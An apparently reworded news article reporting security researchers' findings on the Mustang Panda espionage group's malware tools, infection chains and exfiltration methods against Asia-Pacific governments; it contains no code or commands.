Mustang Panda Employs Advanced Malware for Surveillance of Asia-Pacific Governments
An entity known as Mustang Panda has enhanced its malware collection by incorporating novel instruments to streamline data extraction and the initiation of subsequent-stage payloads, as per recent discoveries from Trend Micro.
The cybersecurity company, which is supervising the activity grouping under the title Earth Preta, stated it noticed “the dissemination of PUBLOAD through a variation of the worm HIUPAN.”
PUBLOAD is a recognized downloader malware connected to Mustang Panda since the start of 2022, employed in cyber assaults against governmental bodies in the Asia-Pacific (APAC) area to dispatch the PlugX malware.
“PUBLOAD was also utilized to insert auxiliary utilities into the targets’ framework, like FDMTP to function as an additional management tool, that displayed akin responsibilities to PUBLOAD; and PTSOCKET, a utility exploited as a substitute exfiltration choice,” stated security analysts Lenart Bermejo, Sunny Lu, and Ted Lee.
Mustang Panda’s usage of detachable drives as a medium for propagation of HIUPAN was formerly chronicled by Trend Micro in March 2023. It’s recognized by Google-owned Mandiant as MISTCLOAK, as witnessed in association with a cyber espionage offensive targeting the Philippines that may have started back in September 2021.
PUBLOAD is furnished with abilities to carry out reconnaissance on the contaminated network and gather desired file types (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx), also performing as a canal for a new hacking instrument named FDMTP, which is a “rudimentary malware downloader” executed based on TouchSocket over Duplex Message Transport Protocol (DMTP).
The attained information is compressed into an RAR archive and transmitted to a FTP server managed by the attacker via cURL. Alternatively, Mustang Panda has also been noticed deploying a custom app titled PTSOCKET that can transfer files in multi-thread mode.
Moreover, Trend Micro has linked the adversary to an “agile” spear-phishing operation identified in June 2024 for sending email messages carrying a .url accessory, which when initiated, is used to distribute a digitally signed downloader named DOWNBAIT.
It is speculated that this campaign targeted Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan based on the filenames and context of the false documents employed.
DOWNBAIT functions as a preliminary loading tool employed to obtain and implement the PULLBAIT shellcode in memory, which then downloads and operates the initial-stage backdoor recognized as CBROVER.
The implant, on its part, endorses file retrieval and remote shell execution capacities, besides serving as a conduit for dispersing the PlugX remote access trojan (RAT). PlugX, in turn, deals with deploying another personalized file collector referred to as FILESAC for gathering the victim’s documents.
This revelation emerges as Palo Alto Networks Unit 42 outlined Mustang Panda’s exploitation of Visual Studio Code’s embedded reverse shell feature to establish a foothold in target networks, indicating the entity’s active adjustment of its mode of operation.
“Earth Preta has showcased substantial improvements in their malware deployment and methodologies, particularly in their initiatives intended for governmental bodies,” stated the researchers. “The group has transformed their strategies, […] harnessing multi-stage downloaders (from DOWNBAIT to PlugX) and potentially leveraging Microsoft’s cloud services for information exfiltration.”
About Author
